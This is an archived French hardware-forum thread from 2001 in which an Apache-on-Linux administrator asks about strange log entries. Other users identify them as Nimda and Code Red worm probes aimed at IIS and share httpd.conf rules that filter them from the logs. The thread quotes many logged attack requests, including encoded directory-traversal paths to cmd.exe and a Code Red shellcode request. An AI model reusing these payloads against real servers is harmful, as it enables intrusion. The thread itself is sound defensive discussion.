Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2977 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs

  Logs Apache bizarres ....

 
 


Dernière réponse
Sujet : Logs Apache bizarres ....
Sly Angel oui mais la dans ce cas tu ajoutes ces lignes pour pas polluer le log principal :) :
 
Custom /var/log/httpd/attack.err error env=nolog
 
 
Custom /var/log/httpd/attack.access common env=nolog
Custom /var/log/httpd/attack.refer refer env=nolog

Votre réponse
Nom d'utilisateur    Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !
Le ton de votre message                        
                       
Votre réponse
[b][i][u][strike][spoiler][fixed][cpp][url][email][img][*]   
 
   [quote]
 
Options

 
Vous avez perdu votre mot de passe ?


Vue Rapide de la discussion
Sly Angel oui mais la dans ce cas tu ajoutes ces lignes pour pas polluer le log principal :) :
 
Custom /var/log/httpd/attack.err error env=nolog
 
 
Custom /var/log/httpd/attack.access common env=nolog
Custom /var/log/httpd/attack.refer refer env=nolog
allergy Mais non, il faut les laisser dans les logs, et faire des trucs du genre : http://alrj.org/~allergy/nimda/
:)
nicotine ca allege tes logs de ces saloperies ...
nicotine httpd.conf chez moi :  
 
ErrorLog /web/apache/logs/error_log  
SetEnvIf Request_URI "\.exe$" nolog  
SetEnvIf Request_URI "\.ida$" nolog  
CustomLog /web/apache/logs/error_log common env=!nolog  
 
SetEnvIf Request_URI "\.ida$" nolog  
SetEnvIf Request_URI "\.exe$" nolog  
CustomLog /web/apache/logs/access_log common env=!nolog  
CustomLog /web/apache/logs/referer_log referer env=!nolog

 

[edtdd]--Message édité par nicotine--[/edtdd]
minusplus ben pas si leur but est aussi de saturer les réseaux et les machines infectées...
Sly Angel Faudrait surtout que les abrutis de concepteurs de cette merde regarde ce que c'est le server avant de lancer les lignes à la bourrain et rempli mon DD :o
 
Je vais finir par foutre un CRON pour faire un grep -v "c+dir" pour voir ce qu'il y a d'autre dans mon access apache :o
 
tiens aussi un code red :

Code :
  1. 217.11.165.110 - - [13/Sep/2001:22:46:44 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  2. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  3. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  4. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  5. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
  6. ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
  7. bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
  8. b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 281


 
aussi plein de lignes, si c'est pas malheureux de remplir un log apache sous linux avec des attaques IIS :lol:

minusplus faudrait lui faire lancer wine avant...
c'est un virus de merde !
 
 
:D
Sly Angel Pour plus d'infos : http://www.securityspace.org/smyse [...] a_amm.html
 
Bien sur executer cmd.exe sur un linux il aura du mal ;)
_Evangelion_ rien, tu es sous apache, or cette "daube" n'est efficace que contre IIS.
 
A part remplir tes logs, c'est tout ce que ca va te faire.
pingu23 ok ...
mais que dois-je faire maintenant ? puis-je peux laisser faire sans risques pour mon serveur ?
Dark_Schneider c'est un virus/vers windows qui essaie d'attaquer ta machine. Mais bon pour trouver des .exe et un rep winnt, il peut toujours se brosser.
 
news sur linuxfr
 
http://computerworld.com/nlt/1%2C3 [...] %2C00.html

 

[edtdd]--Message édité par Dark_Schneider--[/edtdd]
pingu23 j'ai mon serveur web apache (1.3.19) sous linux (mandrake 8.0).
de temps en temps je regarde le fichier log d'apache et ces temps ci, je constate la présence de ces lignes :
 
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.128.16 - - [18/Sep/2001:22:42:28 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.44.171 - - [18/Sep/2001:22:46:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.44.171 - - [18/Sep/2001:22:46:15 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
213.44.44.171 - - [18/Sep/2001:22:46:24 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.44.171 - - [18/Sep/2001:22:46:31 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.44.171 - - [18/Sep/2001:22:46:38 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.44.171 - - [18/Sep/2001:22:46:44 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.44.171 - - [18/Sep/2001:22:46:50 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.18.243 - - [18/Sep/2001:22:54:57 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.18.243 - - [18/Sep/2001:22:55:07 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
 
quelqu'un peut me dire ce que sont ces fichiers  ?? (winnt/system32/cmd.exe ...) ???
 
cela commence à m'inquiéter ...
 
merci d'avance

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo

Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)